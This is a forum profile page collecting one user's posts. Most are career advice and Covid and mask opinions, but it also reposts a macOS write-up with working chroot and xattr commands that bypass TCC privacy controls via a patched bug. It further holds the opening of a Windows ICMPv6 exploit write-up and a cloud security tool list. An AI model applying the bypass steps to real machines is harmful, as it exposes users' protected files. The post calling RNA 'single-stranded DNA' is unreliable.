Everything posted by Nytro

  1. Yes, it's very important. When I went to interviews, the people interviewing me: 1. knew me from the forum and from presenting at Defcamp; 2. the person I talked to told me they followed me on Twitter (other people there also knew of me); 3. knew me because I had presented at OWASP and Defcon, plus GitHub (NetRipper); 4. I had met one of them at a conference and they knew a bit about my presentations/blog/RST/projects. It matters a lot. You have to prove what you know; there's no point listing a thousand skills in your CV if you can't demonstrate them. It's like applying for a web designer position, claiming you've built hundreds of sites, and not showing a single one. PS: At pretty much every company I've worked for, I took part in the hiring interviews for new positions. Forum activity, presentations, tutorials and tools have always counted as a plus in my book. If you enjoy the field, you'll end up building something. As the Dinamo supporters put it in one of their messages: "Passion > Reason".
  2. Hi and welcome! Bug bounty doesn't work as well as it used to, because there are an awful lot of people doing it, from all over the world. On top of that, many of them do it "non-stop", meaning maybe more than 8 hours a day. Many are idiots who only report garbage, but there are also plenty of good people who make a lot of money. I don't recommend it as a "career", for the simple reason that it isn't stable. At least not at the beginning. It's better to have a job with a stable income and do bug bounty in your free time. Then, if things go well, you can quit the job and do bug bounty full time. The problem is that you can wake up one day with no money left and... nothing to find, and that's where the pressure and stress come from. Ah, yes, of course: to succeed at this you have to work on private programs, or on programs that haven't already had thousands of people jumping on them. As for a job, like any other job, it's harder at the beginning. Even in dev it can be hard to find your first position; don't give up, and "show what you can do" in your CV. Do bug bounty, do projects, do some research, write a tutorial, anything. It will look good on the CV. Many companies look for experienced people because they need results fast. At the company I work for we needed the same thing: someone senior who comes in, spends a week settling in and then boom, straight to work, alone, without help. But there are also companies that aren't in such a "hurry"; you just need patience and to stand out from the other candidates, to prove what you know straight from the CV. PS: I hope you put what you told us above into your CV.
  3. The crisis won't go away any time soon, not even at the start of next year, even if a good vaccine shows up. The statistics you're asking for don't exist and never will. To have everything done by the book you'd have to test the entire population, see what job everyone has, how they travelled, how many people they met, how many people they spent x minutes talking to, and who knows what else. I don't even know what I did last week... The available statistics are here: https://datelazi.ro/ Out of 210,000 people, 6,400 died. If Romania's population is 21,000,000, that means that if all Romanians got infected, 640,000 people would die. Six hundred and forty thousand. Fine, that's only theoretical, of course, since there are many asymptomatic people who don't even know they were infected. But we would still end up with, say, 210,000 deaths. That is, 1%. It means that out of my 300 Facebook "friends", 3 die. It means that out of 500 active users on this forum, 5 die. Does that seem small to you? Not to me. I don't think that many Romanians die of the flu. Actually, it's clear they don't. And that's with the X measures in place that people keep complaining about. Ah, and I hope you don't start with "X people die of cancer every year", or I'll have a heart attack...
  4. An example of a well-designed protocol: https://signal.org/docs/ Or the one used by Telegram: https://core.telegram.org/mtproto A discussion comparing the two: https://crypto.stackexchange.com/questions/31418/signal-vs-telegram-in-terms-of-protocols
  5. I wore a mask on Saturday too, continuously, 09:00-19:00, and absolutely nothing happened to me. My example was an analogy, not a joke. 1. The consequence is that you don't piss on the other person, who is innocent. 2. Those "few" are in fact very many, and they don't know they're pissing on themselves. And they do it often. 3. Because they don't have space suits and it isn't guaranteed they can't get infected. A doctor who got infected said he had only taken off his gear in the de-gowning room and caught it there, but he could have caught it in a million other places, both inside the hospital (an enclosed space with dozens of confirmed positive people) and outside it (shop, bus, etc.). I haven't seen anyone hunted down or terrified because they wear a scrap of paper or cloth over their mouth. I haven't seen the police chasing anyone either, and I've had absolutely no problem of any kind since this crisis started, and I wear a mask. Actually it's a good thing: people can't see how ugly I am. (I'm kidding, I'm handsome.) Edit: I think many people don't really believe in this virus and its severity because they don't personally know anyone who has been infected. Put the laptops down once in a while and talk to people. I personally know at least 10 people who have been infected, and over the weekend I learned of another 4-5. Relatives. Some had milder symptoms, others... not quite.
  6. Great, the details for applying are here: https://rstcon.com/cfp/
  7. About all this mask nonsense... Let's do an experiment. Two people meet. And they piss on each other, literally. One is wearing trousers, the other isn't. What happens? The same questions follow: what happens if both people wear trousers, or if neither of them does? It's the same with masks. You don't need a medical degree to understand that if you wear something over your mouth and you talk (spitting a little, for example), cough or sneeze, whatever you have on your face helps you not pass on whatever comes out of your mouth. Damn, it's like you were raised in the trees.
  8. Hi, what's the end goal? I mean, what do you want to achieve with this kind of "operation"? Get access to some two-bit servers and use them to (D)DoS who knows what other two-bit server? Things have moved on. Weak passwords can still be found, but I don't think it's as common as it used to be. Besides, to take down a more serious server you need more than 5-6 crappy VPSes. I'd like to believe this isn't done any more, that we can do better. At least the people who still do it put ransomware on the servers and "make a buck". With that DDoS you achieve nothing. And even so, the "interesting" systems don't use a dictionary "admin:password", so it's wasted effort. Sure, something slips through once in a year, it happens, but if this actually worked the news would be full of such stories. Come on, be serious.
  9. I'll believe you if you give me a Web Archive link from a date before 2020. I don't care what the WHO or anyone else says. A document DATED 2017-2018-2019 can convince me. Let me tell you a secret: I'd been telling you about Covid since 2010, but nobody believed me.
  10. Show me one on the Web Archive (since it also shows the publication date). I looked up several and they are all from September 2020. https://web.archive.org/
  11. RT-PCR tests are not new; they have been in use for a long time. Among other things, they can be used to detect the RNA (i.e., single-stranded DNA) of the Covid-19 virus. https://en.wikipedia.org/wiki/Reverse_transcription_polymerase_chain_reaction In other words, fake news. As someone said, the products were probably just renamed because of the Covid crisis. In other words, SEO.
  12. Hi and welcome! What exactly did you do and what happened to you? And what is DIC? My suggestion for everyone is to start by learning the basics, i.e., roughly what these are and how they work: operating systems (Windows, Linux, Mac), networking (TCP/IP), protocols (HTTP, DNS, FTP, SMTP, etc.), a bit of programming in any language, some web (HTML, CSS, JavaScript), SQL, cryptography, etc. After that you can learn about vulnerabilities, how they are exploited and so on. I think the basics are necessary for any job in IT, especially in security. PS: Depending on what you did, you may have some trouble getting hired. My suggestion is to be honest and tell them about it, because if they find out some other way it's worse. A guy came to an interview a few years ago and we had to turn him down even though, technically, he wasn't bad.
  13. Great, here's the 25 Hz vaccine:
  14. Yes, that's pretty much what they all do. There will probably be some real discounts too, but very few. It's good that you're tracking price history; it's the only reliable way not to get ripped off.
  15. Let's combine betting with IT. Why don't you build an automation that takes all the matches and the results from the last x rounds and runs a small statistic (also known as machine learning) to estimate roughly what a team's chances of winning would be? Of course, it's nothing certain, but it could help. Not necessarily to generate matches, but to build a list of "tips" you could use. A rough sketch of the idea follows below.
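     A minimal sketch of that "small statistic" (hypothetical data layout and team names, plain win-rate counting rather than real machine learning):

        # Naive "tip" generator: estimate win chances from recent results.
        from collections import defaultdict

        # Hypothetical recent results: (home, away, outcome), "1" = home win, "X" = draw, "2" = away win.
        recent_results = [
            ("TeamA", "TeamB", "1"),
            ("TeamC", "TeamA", "2"),
            ("TeamB", "TeamC", "X"),
        ]

        wins = defaultdict(int)
        played = defaultdict(int)
        for home, away, outcome in recent_results:
            played[home] += 1
            played[away] += 1
            if outcome == "1":
                wins[home] += 1
            elif outcome == "2":
                wins[away] += 1

        # Laplace smoothing so a team with few matches doesn't come out at 0% or 100%.
        for team in sorted(played):
            p_win = (wins[team] + 1) / (played[team] + 2)
            print(f"{team}: estimated win chance {p_win:.0%}")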
  16. I still occasionally see Facebook posts from people (whom I know personally) who don't consider Covid-19 much of a problem. And they keep sharing whatever garbage they find on Facebook. What do these people have in common? They're from the countryside. It makes me think of a lack of education and a below-average IQ (in other words they're idiots, but I wanted to put it academically), but also of the fact that rural areas haven't had that many cases, since there's less interaction there, and because they "haven't seen it" with their own eyes, they don't believe it. On the one hand I understand them; their sources of information are not exactly experts in the field. But I'm sure that if they listened to Florin Salam they would believe in the virus (his brother died of Covid). One part of me wants to bring them back onto the right path, but the other part tells me that Darwin was right and the problem will solve itself.
  17. We Need To Talk About MACL

Posted on 2020-10-18. Tagged in: low-level, macos

If you've never heard of MACL on macOS, you're not alone. This obscure, hidden part of macOS underpins Apple's concept of User-Intent, a shift in focus for macOS privacy controls that attempts to stop endless prompts from interrupting the user. And by now we all understand just how annoying these alerts can be to us attackers. Being able to operate on an endpoint without giving the game away is of course essential, and unfortunately staying under the radar on macOS is getting tougher with each release. Even once we've compromised the endpoint and elevated to root, much of the data stored in files is unavailable, and one wrong step can lead to the dreaded alert.

Now if you read this blog you'll know that I have previously looked at bypasses for Apple's privacy controls (also known as TCC) by loading dylibs into specific Apple applications containing entitlements. That being said, I always like to have one or two esoteric techniques available for when those tougher jobs come up. So in this post we're going to look at just how macOS's User-Intent system works, expose its attack surface, and disclose a vulnerability (CVE-2020-9968) found while looking at ways to abuse the User-Intent functionality to bypass TCC.

Just What Is User-Intent?

During a recent conversation/hacking session with @rbmaslen we spent a bit of time looking at odd behaviour observed while tailoring a TCC bypass for a client. You may have seen this behaviour yourself, but if not, give this a go...

Using Catalina, open an application such as Visual Studio Code, choose File -> Open to display the usual dialog and select any file on your Desktop. After clicking Open you will notice two things: first, you will not receive the usual "Visual Studio Code would like to access files in your Desktop folder" prompt... and even if you block access to the Desktop folder for Visual Studio Code using the privacy settings, you still retain access to the file.

After a bit of Googling to understand what was going on, this video from the 2019 WWDC conference explained a lot. The talk gives a brief mention of User-Intent vs User-Consent, where we can see Apple trying to solve an issue which plagued Windows users during the rollout of UAC. Apple's solution with Catalina was to create a way of allowing a user to approve access to a file or directory without having to explicitly select an option via a dialog box every time. There are a few ways to see User-Intent in action:

  • A user selecting a file via an Open or Save dialog.
  • A user dragging a file from Finder onto another application window.
  • A user double-clicking on a file in Finder.

And of course this logic stacks up: after all, if a user selects a file explicitly in a dialog box, why would you ever need to prompt them again for consent? This is the point where an all-consuming obsession to know why things work the way they do kicks in! It took me a few days to get my head around all the moving parts, but what I found was an impressive system which Apple has built to handle user privacy. Let's focus on the example of a user selecting a file via the Open dialog by crafting a small application.
The full source code is available here, but for now we will focus on these two methods of selecting a file:

    // Uses the open() syscall to open a file handle
    - (IBAction)clickedOpenManual:(id)sender {
        NSString *val = [_openTextBox stringValue];
        int fd = open([val cString], O_RDONLY);
        if (fd > 0) {
            [[self->_logTextBox documentView] insertText:@"Attempting to open file: Success\n"];
        } else {
            [[self->_logTextBox documentView] insertText:@"Attempting to open file: Failure\n"];
        }
    }

    // Uses the Open dialog to choose a target file
    - (IBAction)clickedOpen:(id)sender {
        NSOpenPanel* panel = [NSOpenPanel openPanel];
        [panel setCanChooseDirectories:YES];
        [panel beginWithCompletionHandler:^(NSInteger result){
            if (result == NSModalResponseOK) {
                NSURL* theDoc = [[panel URLs] objectAtIndex:0];
                [[self->_logTextBox documentView] insertText:[NSString stringWithFormat:@"Selected file: %@\n", [theDoc path]]];
            }
        }];
    }

This small example gives us two ways to handle a file: either by directly calling the open() syscall on a path, or by allowing the user to select a file via the Open dialog box.

If we start with the open() syscall and attempt to open a file on our Desktop, we are greeted with the familiar dialog, and if we select the "Don't Allow" option, we see that of course our attempt to open the file fails.

Next we launch the Open dialog and select the target file before clicking Open. Surprisingly, this time everything works just fine, even though we have explicitly denied access. Further, if we restart the app and provide the path to the same file without selecting it via the dialog this time, we see that the open method works fine.

This is User-Intent in action: macOS sees that we have used the dialog to select a file, which in turn gives our application permission to access its contents without forcing any further warnings.

Now this is where things get interesting. Let's take a look at the attributes applied to the file we selected, using the command:

    xattr -l ~/Documents/supersecretz.txt

In the output we are introduced to the com.apple.macl attribute, which is the magic behind this functionality.

com.apple.macl

The MACL attribute usually consists of a header value of 02 00 followed by a UUID corresponding to the application permitted to access the file. The UUID is unique for each system, user and application, meaning that we can't predict what this value will be in advance. I'm not too sure whether it was implemented this way due to privacy concerns (after all, this gives a nice artifact to see which files a user has accessed with an application), but in any case we know that if this MACL attribute has been added, the matching application and user can re-access the file without ever having to deal with privacy settings.

To show this in action, let's take the MACL entry added to our test file above and apply it directly to another file such as ~/Desktop/secret.txt:

    xattr -wx com.apple.macl 020091877181CB4E4D7F8004D7BFF6B58C58000000000000000000000000 ~/Desktop/secret.txt

As expected, we see that we can now open this file directly from our application without needing to bother with privacy settings. Now let's try to remove the MACL from the file using:

    xattr -d com.apple.macl ~/Desktop/secret.txt

Somewhat unexpectedly, the MACL instantly reappears. This means that, by design, once a MACL has been added to a file it is difficult to remove.
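If you want to poke at this attribute from a script, a small sketch that just shells out to the xattr tool used above works fine (the file path is an example; the 02 00 header and UUID split follow the layout described above):

    # Dump the raw com.apple.macl bytes of a file via the macOS xattr CLI.
    import subprocess

    path = "/Users/you/Desktop/secret.txt"  # example path
    out = subprocess.run(
        ["xattr", "-p", "-x", "com.apple.macl", path],
        capture_output=True, text=True,
    )
    if out.returncode == 0:
        raw = bytes.fromhex(out.stdout.replace(" ", "").replace("\n", ""))
        print("header:", raw[:2].hex())    # usually 02 00
        print("uuid:  ", raw[2:18].hex())  # per-system/user/app UUID described above
    else:
        print("no com.apple.macl attribute:", out.stderr.strip())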
Any attempt to remove the attribute will also be greeted with a message in Console.

How The Open Dialog Applies The MACL

So what makes the Open dialog so special, and just how does it add a MACL to a file it should otherwise not have access to? Obviously our own applications can't just go around adding MACLs willy-nilly, as that would be a pretty large hole in macOS privacy controls, so something else is surely at play here.

Let's start with AppKit.framework, which is actually responsible for the Open dialog. What we find is that the framework consists of not only the AppKit library, but also a number of supporting XPC services. This is a common pattern used by Apple frameworks: it allows entitlements to be assigned to a service which can then be requested over XPC from a library loaded into our process. The obvious XPC service that sticks out here is com.apple.appkit.xpc.openAndSavePanelService.xpc. When we look at its entitlements, we see a number of private entitlements, including the coveted kTCCServiceSystemPolicyAllFiles entitlement, which grants access to all files in privacy-protected locations without ever prompting the user. Now this makes sense, as macOS requires the ability to actually access a file regardless of TCC settings before adding a MACL.

So surely this is the place that applies the MACL to our file? Well..... no. While this service provides the first step of exposing the entitlements needed to access our target files without prompting the user, handling of the MACL attribute is actually done within the kernel, specifically within the Sandbox.kext kernel extension, which means that we need to visit the kernel to understand what is going on.

Kernel Sandbox Extensions

As we go through the imported symbols from AppKit, we find references to a range of functions beginning with sandbox_extension_... These functions wrap calls to the sandbox_ms syscall, invoking the "Sandbox" module with a so-called "extension". In our case we are interested in the methods exposed from libSystem.dylib beginning with sandbox_extension_issue_file... and sandbox_extension_consume.

Let's begin by making a call to one of these methods, sandbox_extension_issue_file_to_self, which takes 3 parameters:

    char* sandbox_extension_issue_file_to_self(const char *sandboxEnt, const char *filePath, int flags);

Upon calling the function and providing the path to a file we have access to, we are returned a string which looks like this:

    f6b75b461bada9c3b2e73400359bc8d5844b4a3d4442700fd352fe45bcfd650b;00;00030000;00001b03;003d0fe5;000000000000001a;com.apple.app-sandbox.read;01;01000005;00000000000d1bbf;1d;/users/xpn/documents

What the hell is this monstrosity? Well, to understand what we are seeing we will need to load our disassembler and jump into Sandbox.kext.
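As an aside before heading into the kernel: the entitlements mentioned above can be dumped with codesign from a small script, for example (a sketch; the XPC service path is an assumption based on the standard AppKit.framework layout and may differ between macOS versions):

    # Dump the entitlements of the openAndSavePanelService XPC service via codesign.
    import subprocess

    # Assumed path inside AppKit.framework's XPCServices directory.
    svc = ("/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/"
           "com.apple.appkit.xpc.openAndSavePanelService.xpc")

    result = subprocess.run(
        ["codesign", "-d", "--entitlements", ":-", svc],
        capture_output=True, text=True,
    )
    print(result.stdout or result.stderr)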
The function we are interested in is _syscall_extension_issue, which takes 2 arguments:

    _syscall_extension_issue(proc_t *proc, struct extension_issue_request *req);

After some reversing, the second argument appears to be a struct similar to:

    struct extension_issue_request {
        const char *sandbox_string;   // 0x00
        int cmd;                      // 0x08
        const char *filePath;         // 0x10
        int flags;                    // 0x18
        char *returnedToken;          // 0x20
        int pid;                      // 0x28
        int res;                      // 0x30
    }

If we spend a bit of time reversing the function, we can figure out the interesting parts of the token:

    f6b75b461bada9c3b2e73400359bc8d5844b4a3d4442700fd352fe45bcfd650b - HMAC-SHA256 of the token
    00 - Sandbox extension cmd
    00030000 - Flags
    00001b03 - PID
    003d0fe5 - PID version
    000000000000001a - Size of sandbox string
    com.apple.app-sandbox.read - Sandbox string
    01 - Does file exist
    01000005 - Filesystem ID
    00000000000d1bbf - iNode ID
    1d - Sandbox storage class
    /users/xpn/documents - Target file path

Before we move on, let's talk about that HMAC-SHA256 hash for a second. The key used for the HMAC is generated when the Sandbox.kext module is loaded, meaning that a token is invalidated on reboot. The key is set to 40 bytes of randomness stored within the _secret variable, so bruteforcing is out of the question.

So what can we do with this returned token? To understand how it is handled we need to look at another method, _syscall_extension_consume, which takes 2 arguments:

    _syscall_extension_consume(proc_t *proc, struct extension_consume_request *req);

Again, by disassembling this function we find that the passed request likely looks like this:

    struct extension_consume_request {
        const char *token;
        int length;
        int *returnValue;
    };

So when our token is parsed, what checks are completed? First up is the validation of the HMAC-SHA256 hash. As a side note, if you are like me and were hoping for a timing attack on the HMAC hash to reveal the secret, Apple already considered this.

Assuming that the HMAC-SHA256 hash matches, the PID and PID version are next validated against our calling process to ensure that they match. If this is OK, we enter one of 4 paths depending on the Sandbox extension cmd value our token contains. For our purposes this will be 0x00, which takes us to the function _macl_record with the following arguments:

    _macl_record(proc_t *proc, const char *filename, bool fileExists, int fsID, int iNode, int res);

This function performs a number of checks on the passed parameters. First it identifies whether the inode exists on the filesystem ID passed; if the file exists, we add our MACL. Interestingly, if the file is found not to exist via the inode, a lookup is performed based on the filename instead, and if the filename exists, the MACL is applied.

And there we have it: the User-Intent flow from application, to XPC-driven dialog, to kernel, to MACL. Now... let's hunt for bugs!

Abusing User-Intent To Bypass TCC

So now that we understand how User-Intent works, are there any ways to abuse this to bypass TCC? After understanding the internals of this system, it took a few hours of looking, but thankfully there is a situation where we can abuse a bug in this process. The easiest way that I could find to assign a MACL to a folder we don't have access to is via a chroot container.
This does mean that we need root or sudo privileges to pull this off, as we need permission to make the chroot call, but let's create a very simple container using something like:

    # Add libs and progs required by our POC
    mkdir -p /tmp/jail/usr/lib/; cp -r /usr/lib/* /tmp/jail/usr/lib/
    mkdir /tmp/jail/bin; cp /bin/bash /tmp/jail/bin

    # Add our POC
    cp /tmp/poc /tmp/jail/

With our container built, let's enter the jail with:

    # Execute our chroot to grab a token
    sudo chroot /tmp/jail /bin/sh -c "mkdir -p /Users/xpn/Documents; /main issue /Users/xpn/Documents"

Once executed... TADA! We now have a token for the chroot path of /Users/xpn/Documents. Now, if we attempt to consume this token... hmm, unfortunately this doesn't work. That's because our inode value still exists, and remember from our earlier research that if the inode exists then it takes precedence over the filename... so let's adjust our command to remove that directory after our token is generated:

    sudo chroot /tmp/jail /bin/sh -c "mkdir -p /Users/xpn/Desktop; /main issue /Users/xpn/Desktop; rmdir /Users/xpn/Desktop"

And this time, if we consume our token, we will see that we have access to the Documents folder, bypassing TCC completely. This of course works for any folder protected by TCC.

Note: I'm not 100% sure why yet, but the rmdir needs to be executed from within the chroot. If you attempt to do something like rm /tmp/jail/Users/xpn/Desktop, applying the token will not result in access to the protected folder. I'd love to know why this is if anyone has any ideas.

So this has hopefully given you an idea of why TCC sometimes appears to allow what is clearly blocked. It is also hopefully an insight into an apparently simple bug which actually took a bit of understanding of macOS internals to discover. As of macOS 10.15.6, iOS 14, watchOS 7 and tvOS 14 this bug has been fixed. Thanks to the Apple security team for making the disclosure process so quick and painless.

Source: https://blog.xpnsec.com/we-need-to-talk-about-macl/
  18. Cloud Security Tools This page is a directory of open source cloud security tools I collected, organized by categories. If I've used a tool I usually publish my notes about it in its own page. Amazon Web Services Google Cloud Platform Azure Kubernetes, Docker, Terraform, Containers, Declarative Infrastructure If you know a tool that is not listed here let me know! TOOLS aardvark Aardvark is a multi-account AWS IAM Access Advisor API 🔗, aws iam actionhero Action Hero is a sidecar style utility to assist with creating least privilege IAM Policies for AWS. 🔗, aws iam Adaz 🔧 Automatically deploy customizable Active Directory labs in Azure 🔗, azure AirIAM Least privilege AWS IAM Terraformer 🔗, declarative-infra terraform aws iam aks-checklist The AKS Checklist 🔗, azure k8s amazon-s3-find-and-forget Amazon S3 Find and Forget is a solution to handle data erasure requests from data lakes stored on Amazon S3, for example, pursuant to the European General Data Protection Regulation (GDPR) 🔗, aws attack_range A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk 🔗, automated-cloud-advisor Automated Cloud Advisor is a extensible tool that aims at facilitating cost optimization in AWS, by collecting data for resources that are under utilized. In addition, this is a great learning tool for new DevOps/Cloud engineers that want to start automating things in AWS. 🔗, aws autovpn Create On Demand Disposable OpenVPN Endpoints on AWS. 🔗, aws aws-auto-remediate Open source application to instantly remediate common security issues through the use of AWS Config 🔗, aws aws-billing-slack-lambda Simple AWS Lambda powered Slack bot that reports your AWS Costs for the current month to a channel 🔗, aws aws-iam-authenticator A tool to use AWS IAM credentials to authenticate to a Kubernetes cluster 🔗, aws iam k8s aws-iamctl 🔗, aws iam aws-incident-response 🔗, aws incident-response aws-incident-response-runbooks 🔗, aws incident-response aws-lambda-api-call-recorder A recorder of AWS API calls for Lambda functions 🔗, aws aws-recon Multi-threaded AWS inventory collection tool with a focus on security-relevant resources and metadata. 🔗, aws aws-s3-virusscan Antivirus for Amazon S3 buckets 🔗, aws aws-sso-credential-process Bring AWS SSO-based credentials to the AWS SDKs until they have proper support 🔗, aws aws_exposable_resources Resource types that can be publicly exposed on AWS 🔗, aws aws_key_triage_tool Script to automate initial triage/enumeration on a set of aws keys in an input file. 🔗, aws capsule Kubernetes multi-tenant Operator 🔗, k8s cdkgoat CdkGoat is Bridgecrew's "Vulnerable by Design" AWS CDK repository. CdkGoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments. 🔗, aws cfngoat Cfngoat is Bridgecrew's "Vulnerable by Design" Cloudformation repository. Cfngoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments. 
🔗, aws declarative-infra chart-testing CLI tool for linting and testing Helm charts 🔗, k8s cloudformation-guard A set of tools to check AWS CloudFormation templates for policy compliance using a simple, policy-as-code, declarative syntax 🔗, aws declarative-infra cloudkeeper Cloudkeeper - Housekeeping for Clouds 🔗, CloudShell Container Image for Azure Cloud Shell (https://azure.microsoft.com/en-us/features/cloud-shell/) 🔗, azure containers cloudsplaining Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report. 🔗, aws iam cloudtracker CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies. 🔗, iam container-diff container-diff: Diff your Docker containers 🔗, docker containers container-scan A GitHub action to help you scan your docker image for vulnerabilities 🔗, docker containers CONVEX CONVEX is a group of CTFs that are independently deployable into participant Azure environments. 🔗, azure copilot-cli The AWS Copilot CLI is a tool for developers to build, release and operate production ready containerized applications on Amazon ECS and AWS Fargate. 🔗, aws containers dagda a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities 🔗, docker containers dast-operator Dynamic Application and API Security Testing 🔗, DefendTheFlag Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products. 🔗, azure detection-rules Rules for Elastic Security's detection engine 🔗, docker-slim DockerSlim (docker-slim): Don't change anything in your Docker container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source) 🔗, docker containers dockerfile-security A collection of OPA rules to statically analyze Dockerfiles to improve security 🔗, declarative-infra docker containers dockle Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start 🔗, docker containers dostainer 🔗, Dragonfly Dragonfly is an intelligent P2P based image and file distribution system. 🔗, gatekeeper Gatekeeper - Policy Controller for Kubernetes 🔗, k8s gcp-iam-role-permissions Exports primitive and predefined GCP IAM Roles and their permissions 🔗, gcp iam gimme-aws-creds A CLI that utilizes Okta IdP via SAML to acquire temporary AWS credentials 🔗, aws gke-auditor 🔗, k8s gcp goldpinger Debugging tool for Kubernetes which tests and displays connectivity between nodes in the cluster. 🔗, k8s govuk-aws The GOV.UK repository for our Migration to AWS 🔗, aws grype A vulnerability scanner for container images and filesystems 🔗, containers helm-freeze Freeze your charts in the wished versions 🔗, k8s http-desync-guardian Analyze HTTP requests to minimize risks of HTTP Desync attacks (precursor for HTTP request smuggling/spli). 🔗, iam-policies-cli A CLI tool for building simple to complex IAM policies 🔗, iam infracost Cloud cost estimates for Terraform in your CLI and pull requests 💰📉 🔗, terraform declarative-infra k8s-audit-log-inspector 🔗, k8s k8s-diagrams A collection of kubernetes-related diagrams 🔗, k8s k8s-snapshots Automatic Volume Snapshots on Kubernetes. 
🔗, k8s kconmon A Kubernetes node connectivity monitoring tool 🔗, k8s kconnect Kubernetes Connection Manager CLI 🔗, k8s kip Virtual-kubelet provider running pods in cloud instances 🔗, k8s konstraint A policy management tool for interacting with Gatekeeper 🔗, krane Kubernetes RBAC static Analysis & visualisation tool 🔗, k8s kube-fluentd-operator Auto-configuration of Fluentd daemon-set based on Kubernetes metadata 🔗, k8s kube-forensics 🔗, k8s kube-janitor Clean up (delete) Kubernetes resources after a configured TTL (time to live) 🔗, k8s kube-prometheus Use Prometheus to monitor Kubernetes and applications running on Kubernetes 🔗, k8s kubectl-fuzzy This tool uses fzf(1)-like fuzzy-finder to do partial or fuzzy search of Kubernetes resources. Instead of specifying full resource names to kubectl commands, you can choose them from an interactive list that you can filter by typing a few characters. 🔗, k8s kubectl-images 🕸 Show container images used in the cluster. 🔗, k8s containers kubefs Mount kubernetes metadata storage as a filesystem 🔗, k8s kubei Kubei is a flexible Kubernetes runtime scanner, scanning images of worker and Kubernetes nodes providing accurate vulnerabilities assessment, for more information checkout: 🔗, k8s kuberhealthy A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus! 🔗, k8s kubernetes-examples Minimal self-contained examples of standard Kubernetes features and patterns in YAML 🔗, k8s kubernetes-goat Kubernetes Goat is "Vulnerable by Design" Kubernetes Cluster. 🔗, k8s litmus Litmus helps Kubernetes SREs and developers practice chaos engineering in a Kubernetes native way. Chaos experiments are published at the ChaosHub (https://hub.litmuschaos.io). Community notes is at https://hackmd.io/a4Zu_sH4TZGeih-xCimi3Q 🔗, k8s lsh Run interactive shell commands on AWS Lambda 🔗, aws opa-image-scanner Kubernetes Admission Controller for Image Scanning using OPA 🔗, k8s declarative-infra PowerZure PowerShell framework to assess Azure security 🔗, azure professional-services Common solutions and tools developed by Google Cloud's Professional Services team 🔗, gcp rego-policies Rego policies collection 🔗, regula Regula checks Terraform for AWS, Azure and GCP security and CIS compliance using Open Policy Agent/Rego 🔗, terraform azure gcp aws declarative-infra rode cloud native software supply chain ☁️🔗 🔗, secrets-store-csi-driver-provider-azure Azure Key Vault provider for Secret Store CSI driver allows you to get secret contents stored in Azure Key Vault instance and use the Secret Store CSI driver interface to mount them into Kubernetes pods. 🔗, azure k8s SFPolDevChk Salesforce Policy Deviation Checker 🔗, SimuLand Cloud Templates and scripts to deploy mordor environments 🔗, sinker A tool to sync images from one container registry to another 🔗, containers SkyArk SkyArk helps to discover, assess and secure the most privileged entities in Azure and AWS 🔗, azure aws spacesiren A honey token manager and alert system for AWS. 
🔗, aws starboard Kubernetes-native security tool kit 🔗, k8s starboard-octant-plugin Octant plugin for viewing Starboard security information 🔗, stash 🛅 Backup your Kubernetes Stateful Applications 🔗, k8s Stormspotter Azure Red Team tool for graphing Azure and Azure Active Directory objects 🔗, azure syft CLI tool and library for generating a Software Bill of Materials from container images and filesystems 🔗, containers synator Synator Kubernetes Secret and ConfigMap synchronizer 🔗, k8s talisman By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys. 🔗, terragoat TerraGoat is Bridgecrew's "Vulnerable by Design" Terraform repository. TerraGoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments. 🔗, terraform declarative-infra trailscraper A command-line tool to get valuable information out of AWS CloudTrail 🔗, aws tunshell Remote shell into ephemeral environments 🐚 🦀 🔗, vector High-performance, vendor-neutral observability pipelines. 🔗, version-checker Kubernetes utility for exposing image versions in use, compared to latest available upstream, as metrics. 🔗, k8s whalescan Whalescan is a vulnerability scanner for Windows containers, which performs several benchmark checks, as well as checking for CVEs/vulnerable packages on the container 🔗, containers whispers Identify hardcoded secrets and dangerous behaviours Sursa: https://cloudberry.engineering/tool/
  19. CVE-2020-16898 – Exploiting the "Bad Neighbor" vulnerability

16 Oct, by pi3

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft's description of the vulnerability:

"A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer. The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets."

This vulnerability is important enough that I decided to write a proof-of-concept for it. At the time there weren't any public exploits for it. I spent a significant amount of time analyzing all the caveats needed for triggering the bug; even now, the available information doesn't provide sufficient details for triggering it. That's why I've decided to summarize my experience. First, a short summary:

  • This bug can ONLY be exploited when the source address is a link-local IPv6 address. This requirement limits the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw up the headers too much, your packet will be rejected before the bug is triggered.
  • During validation of the packet size, every "Length" defined in the optional headers must match the packet size.
  • This vulnerability allows you to smuggle an extra "header". This header is not validated and includes a "Length" field; after the bug is triggered, that field is still inspected against the packet size.
  • The Windows NDIS API which can trigger the bug has a very annoying optimization (from the exploitation perspective). To bypass it, you need to use fragmentation! Otherwise you can trigger the bug, but it won't result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information I could find were the write-ups accompanying the detection logic. It's a funny twist of fate that the information on how to protect against the attack was helpful in exploitation. Write-ups:

  • https://github.com/advanced-threat-research/CVE-2020-16898
  • https://news.sophos.com/en-us/2020/10/13/top-reason-to-apply-october-2020s-microsoft-patches-ping-of-death-redux/

The most crucial piece of information is the following:

